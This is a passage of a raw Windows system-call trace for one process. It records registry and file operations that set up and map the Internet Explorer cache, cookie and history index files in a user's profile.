\0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 120, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (164, "Cache", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0"}, 120, ) }, 120, ) == 0x0 02173 896 NtClose (164, ... ) == 0x0 02174 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files"}, 1239180, ... ) }, 1239180, ... ) == 0x0 02175 896 NtCreateKey (0x2000000, {24, 120, 0x40, 0, 0, (0x2000000, {24, 120, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 164, 2, ) }, 0, 0x0, 0, ... 164, 2, ) == 0x0 02176 896 NtSetValueKey (164, (164, "Cache", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0", 162, ... ) , 0, 1, (164, "Cache", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0T\0e\0m\0p\0o\0r\0a\0r\0y\0 \0I\0n\0t\0e\0r\0n\0e\0t\0 \0F\0i\0l\0e\0s\0\0\0", 162, ... ) , 162, ... ) == 0x0 02177 896 NtClose (164, ... ) == 0x0 02178 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files"}, 1239928, ... ) }, 1239928, ... ) == 0x0 02179 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files"}, 1239136, ... ) }, 1239136, ... ) == 0x0 02180 896 NtOpenFile (0x100100, {24, 0, 0x40, 0, 0, (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files"}, 7, 2113568, ... 164, {status=0x0, info=1}, ) }, 7, 2113568, ... 164, {status=0x0, info=1}, ) == 0x0 02181 896 NtSetInformationFile (164, 1239124, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02182 896 NtClose (164, ... ) == 0x0 02183 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\desktop.ini"}, 1239132, ... ) }, 1239132, ... ) == 0x0 02184 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5"}, 1239928, ... ) }, 1239928, ... ) == 0x0 02185 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5"}, 1239136, ... ) }, 1239136, ... ) == 0x0 02186 896 NtOpenFile (0x100100, {24, 0, 0x40, 0, 0, (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5"}, 7, 2113568, ... 164, {status=0x0, info=1}, ) }, 7, 2113568, ... 164, {status=0x0, info=1}, ) == 0x0 02187 896 NtSetInformationFile (164, 1239124, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02188 896 NtClose (164, ... ) == 0x0 02189 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini"}, 1239132, ... ) }, 1239132, ... ) == 0x0 02190 896 NtQueryValueKey (160, (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0 02191 896 NtQueryValueKey (160, (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0 02192 896 NtQueryValueKey (160, (160, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\260\376\3\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (160, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\260\376\3\0"}, 16, ) }, 16, ) == 0x0 02193 896 NtOpenKey (0xf, {24, 156, 0x40, 0, 0, (0xf, {24, 156, 0x40, 0, 0, "Cookies"}, ... 164, ) }, ... 164, ) == 0x0 02194 896 NtQueryValueKey (164, (164, "PerUserItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02195 896 NtOpenKey (0xf, {24, 152, 0x40, 0, 0, (0xf, {24, 152, 0x40, 0, 0, "Cookies"}, ... 176, ) }, ... 176, ) == 0x0 02196 896 NtQueryValueKey (176, (176, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (176, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 02197 896 NtClose (176, ... ) == 0x0 02198 896 NtClose (164, ... ) == 0x0 02199 896 NtClose (160, ... ) == 0x0 02200 896 NtOpenKey (0xf, {24, 156, 0x40, 0, 0, (0xf, {24, 156, 0x40, 0, 0, "Cookies"}, ... 160, ) }, ... 160, ) == 0x0 02201 896 NtOpenThreadToken (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN 02202 896 NtReleaseSemaphore (172, 1, ... 0, ) == 0x0 02203 896 NtWaitForSingleObject (172, 0, {0, 0}, ... ) == 0x0 02204 896 NtCreateKey (0x2000000, {24, 120, 0x40, 0, 0, (0x2000000, {24, 120, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 164, 2, ) }, 0, 0x0, 0, ... 164, 2, ) == 0x0 02205 896 NtQueryValueKey (164, (164, "Cookies", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0"}, 56, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (164, "Cookies", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0"}, 56, ) }, 56, ) == 0x0 02206 896 NtClose (164, ... ) == 0x0 02207 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Cookies"}, 1239180, ... ) }, 1239180, ... ) == 0x0 02208 896 NtCreateKey (0x2000000, {24, 120, 0x40, 0, 0, (0x2000000, {24, 120, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 164, 2, ) }, 0, 0x0, 0, ... 164, 2, ) == 0x0 02209 896 NtSetValueKey (164, (164, "Cookies", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0", 98, ... ) , 0, 1, (164, "Cookies", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0C\0o\0o\0k\0i\0e\0s\0\0\0", 98, ... ) , 98, ... ) == 0x0 02210 896 NtClose (164, ... ) == 0x0 02211 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Cookies"}, 1239928, ... ) }, 1239928, ... ) == 0x0 02212 896 NtQueryValueKey (160, (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) }, 28, ) == 0x0 02213 896 NtQueryValueKey (160, (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0o\0o\0k\0i\0e\0:\0\0\0"}, 28, ) }, 28, ) == 0x0 02214 896 NtQueryValueKey (160, (160, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (160, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0 02215 896 NtOpenKey (0xf, {24, 156, 0x40, 0, 0, (0xf, {24, 156, 0x40, 0, 0, "History"}, ... 164, ) }, ... 164, ) == 0x0 02216 896 NtQueryValueKey (164, (164, "PerUserItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 02217 896 NtOpenKey (0xf, {24, 152, 0x40, 0, 0, (0xf, {24, 152, 0x40, 0, 0, "History"}, ... 176, ) }, ... 176, ) == 0x0 02218 896 NtQueryValueKey (176, (176, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (176, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 02219 896 NtClose (176, ... ) == 0x0 02220 896 NtClose (164, ... ) == 0x0 02221 896 NtClose (160, ... ) == 0x0 02222 896 NtOpenKey (0xf, {24, 156, 0x40, 0, 0, (0xf, {24, 156, 0x40, 0, 0, "History"}, ... 160, ) }, ... 160, ) == 0x0 02223 896 NtOpenThreadToken (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN 02224 896 NtReleaseSemaphore (172, 1, ... 0, ) == 0x0 02225 896 NtWaitForSingleObject (172, 0, {0, 0}, ... ) == 0x0 02226 896 NtCreateKey (0x2000000, {24, 120, 0x40, 0, 0, (0x2000000, {24, 120, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"}, 0, 0x0, 0, ... 164, 2, ) }, 0, 0x0, 0, ... 164, 2, ) == 0x0 02227 896 NtQueryValueKey (164, (164, "History", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0"}, 86, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (164, "History", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0"}, 86, ) }, 86, ) == 0x0 02228 896 NtClose (164, ... ) == 0x0 02229 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History"}, 1239180, ... ) }, 1239180, ... ) == 0x0 02230 896 NtCreateKey (0x2000000, {24, 120, 0x40, 0, 0, (0x2000000, {24, 120, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"}, 0, 0x0, 0, ... 164, 2, ) }, 0, 0x0, 0, ... 164, 2, ) == 0x0 02231 896 NtSetValueKey (164, (164, "History", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0", 128, ... ) , 0, 1, (164, "History", 0, 1, "C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\0\0", 128, ... ) , 128, ... ) == 0x0 02232 896 NtClose (164, ... ) == 0x0 02233 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History"}, 1239928, ... ) }, 1239928, ... ) == 0x0 02234 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History"}, 1239136, ... ) }, 1239136, ... ) == 0x0 02235 896 NtOpenFile (0x100100, {24, 0, 0x40, 0, 0, (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History"}, 7, 2113568, ... 164, {status=0x0, info=1}, ) }, 7, 2113568, ... 164, {status=0x0, info=1}, ) == 0x0 02236 896 NtSetInformationFile (164, 1239124, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02237 896 NtClose (164, ... ) == 0x0 02238 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\desktop.ini"}, 1239132, ... ) }, 1239132, ... ) == 0x0 02239 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5"}, 1239928, ... ) }, 1239928, ... ) == 0x0 02240 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5"}, 1239136, ... ) }, 1239136, ... ) == 0x0 02241 896 NtOpenFile (0x100100, {24, 0, 0x40, 0, 0, (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5"}, 7, 2113568, ... 164, {status=0x0, info=1}, ) }, 7, 2113568, ... 164, {status=0x0, info=1}, ) == 0x0 02242 896 NtSetInformationFile (164, 1239124, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02243 896 NtClose (164, ... ) == 0x0 02244 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\desktop.ini"}, 1239132, ... ) }, 1239132, ... ) == 0x0 02245 896 NtQueryValueKey (160, (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) }, 30, ) == 0x0 02246 896 NtQueryValueKey (160, (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (160, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="V\0i\0s\0i\0t\0e\0d\0:\0\0\0"}, 30, ) }, 30, ) == 0x0 02247 896 NtQueryValueKey (160, (160, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (160, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0 02248 896 NtClose (160, ... ) == 0x0 02249 896 NtClose (156, ... ) == 0x0 02250 896 NtClose (152, ... ) == 0x0 02251 896 NtOpenMutant (0x100000, {24, 48, 0x0, 0, 0, (0x100000, {24, 48, 0x0, 0, 0, "Local\_!MSFTHISTORY!_"}, ... 152, ) }, ... 152, ) == 0x0 02252 896 NtOpenMutant (0x100000, {24, 48, 0x0, 0, 0, (0x100000, {24, 48, 0x0, 0, 0, "Local\c:!documents and settings!martim carbone!local settings!temporary internet files!content.ie5!"}, ... 156, ) }, ... 156, ) == 0x0 02253 896 NtWaitForSingleObject (156, 0, 0x0, ... ) == 0x0 02254 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\"}, 1241236, ... ) }, 1241236, ... ) == 0x0 02255 896 NtOpenFile (0x100100, {24, 0, 0x40, 0, 0, (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\"}, 7, 2113568, ... 160, {status=0x0, info=1}, ) }, 7, 2113568, ... 160, {status=0x0, info=1}, ) == 0x0 02256 896 NtSetInformationFile (160, 1241228, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02257 896 NtClose (160, ... ) == 0x0 02258 896 NtCreateFile (0xc0100080, {24, 0, 0x40, 0, 1241128, (0xc0100080, {24, 0, 0x40, 0, 1241128, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\index.dat"}, 0x0, 8198, 3, 3, 2144, 0, 0, ... 160, {status=0x0, info=1}, ) }, 0x0, 8198, 3, 3, 2144, 0, 0, ... 160, {status=0x0, info=1}, ) == 0x0 02259 896 NtSetInformationFile (160, 1241220, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02260 896 NtQueryInformationFile (160, 1241200, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 02261 896 NtOpenSection (0x2, {24, 48, 0x0, 0, 0, (0x2, {24, 48, 0x0, 0, 0, "Local\C:_Documents and Settings_Martim Carbone_Local Settings_Temporary Internet Files_Content.IE5_index.dat_802816"}, ... 164, ) }, ... 164, ) == 0x0 02262 896 NtMapViewOfSection (164, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0xdf0000), {0, 0}, 802816, ) == 0x0 02263 896 NtReleaseMutant (156, ... 0x0, ) == 0x0 02264 896 NtOpenMutant (0x100000, {24, 48, 0x0, 0, 0, (0x100000, {24, 48, 0x0, 0, 0, "Local\c:!documents and settings!martim carbone!cookies!"}, ... 176, ) }, ... 176, ) == 0x0 02265 896 NtWaitForSingleObject (176, 0, 0x0, ... ) == 0x0 02266 896 NtAllocateVirtualMemory (-1, 1359872, 0, 4096, 4096, 4, ... 1359872, 4096, ) == 0x0 02267 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Cookies\"}, 1241236, ... ) }, 1241236, ... ) == 0x0 02268 896 NtOpenFile (0x100100, {24, 0, 0x40, 0, 0, (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Cookies\"}, 7, 2113568, ... 180, {status=0x0, info=1}, ) }, 7, 2113568, ... 180, {status=0x0, info=1}, ) == 0x0 02269 896 NtSetInformationFile (180, 1241228, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02270 896 NtClose (180, ... ) == 0x0 02271 896 NtCreateFile (0xc0100080, {24, 0, 0x40, 0, 1241128, (0xc0100080, {24, 0, 0x40, 0, 1241128, "\??\C:\Documents and Settings\Martim Carbone\Cookies\index.dat"}, 0x0, 8198, 3, 3, 2144, 0, 0, ... 180, {status=0x0, info=1}, ) }, 0x0, 8198, 3, 3, 2144, 0, 0, ... 180, {status=0x0, info=1}, ) == 0x0 02272 896 NtSetInformationFile (180, 1241220, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02273 896 NtQueryInformationFile (180, 1241200, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 02274 896 NtOpenSection (0x2, {24, 48, 0x0, 0, 0, (0x2, {24, 48, 0x0, 0, 0, "Local\C:_Documents and Settings_Martim Carbone_Cookies_index.dat_32768"}, ... 184, ) }, ... 184, ) == 0x0 02275 896 NtMapViewOfSection (184, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0xd40000), {0, 0}, 32768, ) == 0x0 02276 896 NtReleaseMutant (176, ... 0x0, ) == 0x0 02277 896 NtOpenMutant (0x100000, {24, 48, 0x0, 0, 0, (0x100000, {24, 48, 0x0, 0, 0, "Local\c:!documents and settings!martim carbone!local settings!history!history.ie5!"}, ... 188, ) }, ... 188, ) == 0x0 02278 896 NtWaitForSingleObject (188, 0, 0x0, ... ) == 0x0 02279 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\"}, 1241236, ... ) }, 1241236, ... ) == 0x0 02280 896 NtOpenFile (0x100100, {24, 0, 0x40, 0, 0, (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\"}, 7, 2113568, ... 192, {status=0x0, info=1}, ) }, 7, 2113568, ... 192, {status=0x0, info=1}, ) == 0x0 02281 896 NtSetInformationFile (192, 1241228, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02282 896 NtClose (192, ... ) == 0x0 02283 896 NtCreateFile (0xc0100080, {24, 0, 0x40, 0, 1241128, (0xc0100080, {24, 0, 0x40, 0, 1241128, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\index.dat"}, 0x0, 8198, 3, 3, 2144, 0, 0, ... 192, {status=0x0, info=1}, ) }, 0x0, 8198, 3, 3, 2144, 0, 0, ... 192, {status=0x0, info=1}, ) == 0x0 02284 896 NtSetInformationFile (192, 1241220, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02285 896 NtQueryInformationFile (192, 1241200, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 02286 896 NtOpenSection (0x2, {24, 48, 0x0, 0, 0, (0x2, {24, 48, 0x0, 0, 0, "Local\C:_Documents and Settings_Martim Carbone_Local Settings_History_History.IE5_index.dat_81920"}, ... 196, ) }, ... 196, ) == 0x0 02287 896 NtMapViewOfSection (196, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 4, ... (0xd50000), {0, 0}, 81920, ) == 0x0 02288 896 NtReleaseMutant (188, ... 0x0, ) == 0x0 02289 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\"}, 1240812, ... ) }, 1240812, ... ) == 0x0 02290 896 NtOpenFile (0x100100, {24, 0, 0x40, 0, 0, (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\"}, 7, 2113568, ... 200, {status=0x0, info=1}, ) }, 7, 2113568, ... 200, {status=0x0, info=1}, ) == 0x0 02291 896 NtSetInformationFile (200, 1240800, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02292 896 NtClose (200, ... ) == 0x0 02293 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini"}, 1240808, ... ) }, 1240808, ... ) == 0x0 02294 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\"}, 1240812, ... ) }, 1240812, ... ) == 0x0 02295 896 NtOpenFile (0x100100, {24, 0, 0x40, 0, 0, (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\"}, 7, 2113568, ... 200, {status=0x0, info=1}, ) }, 7, 2113568, ... 200, {status=0x0, info=1}, ) == 0x0 02296 896 NtSetInformationFile (200, 1240800, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 02297 896 NtClose (200, ... ) == 0x0 02298 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\Documents and Settings\Martim Carbone\Local Settings\History\History.IE5\desktop.ini"}, 1240808, ... ) }, 1240808, ... ) == 0x0 02299 896 NtWaitForSingleObject (156, 0, 0x0, ... ) == 0x0 02300 896 NtReleaseMutant (156, ... 0x0, ) == 0x0 02301 896 NtOpenKey (0xf, {24, 120, 0x40, 0, 0, (0xf, {24, 120, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 200, ) }, ... 200, ) == 0x0 02302 896 NtOpenKey (0xf, {24, 200, 0x40, 0, 0, (0xf, {24, 200, 0x40, 0, 0, "Extensible Cache"}, ... 204, ) }, ... 204, ) == 0x0 02303 896 NtClose (200, ... ) == 0x0 02304 896 NtWaitForSingleObject (152, 0, {-600000000, -1}, ... ) == 0x0 02305 896 NtEnumerateKey (204, 0, Basic, 288, ... {LastWrite={0x47401762,0x1c74db1}, TitleIdx=0, Name= (204, 0, Basic, 288, ... {LastWrite={0x47401762,0x1c74db1}, TitleIdx=0, Name="feedplat"}, 32, ) }, 32, ) == 0x0 02306 896 NtOpenKey (0xf, {24, 204, 0x40, 0, 0, (0xf, {24, 204, 0x40, 0, 0, "feedplat"}, ... 200, ) }, ... 200, ) == 0x0 02307 896 NtQueryValueKey (200, (200, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (200, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 02308 896 NtQueryValueKey (200, (200, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02309 896 NtQueryValueKey (200, (200, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0F\0e\0e\0d\0s\0 \0C\0a\0c\0h\0e\0\0\0"}, 148, ) , Partial, 148, ... TitleIdx=0, Type=2, Data= (200, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0F\0e\0e\0d\0s\0 \0C\0a\0c\0h\0e\0\0\0"}, 148, ) }, 148, ) == 0x0 02310 896 NtQueryValueKey (200, (200, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW 02311 896 NtQueryValueKey (200, (200, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 